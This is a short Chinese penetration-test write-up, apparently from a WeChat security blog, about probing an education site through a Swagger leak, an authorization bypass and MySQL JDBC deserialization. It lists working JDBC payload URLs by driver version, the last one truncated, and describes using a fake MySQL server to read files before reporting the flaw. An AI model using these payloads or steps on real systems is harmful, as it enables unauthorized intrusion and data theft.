收集了一下资产,收集到了一个这个站点。
发现存在swagger接口泄露
里面的接口基本都要授权,没啥用,找到了一个越权的接口
发现这个站已经被好多人打过了,这里还能看到管理员的邮箱
但是没啥用,注册了一个账号进去发现了这个
尝试打jdbc反序列化
常用的payload:
5.1.11-5.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
6.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections1_calc.exe
8.x
jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.c
先连接一下看一下版本
8的版本,服务器上放一个假的服务器,开打。
一直改链子,shell一直弹不回来。
没办法只能读取文件,成功读取文件。
提交给了一个高危,第二天一看已经修复了,这还不稳。
然后
有大佬带带我吗,目前月榜第八。
原文始发于微信公众号(潇潇安全):一次edu证书站渗透(失败)(补档)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论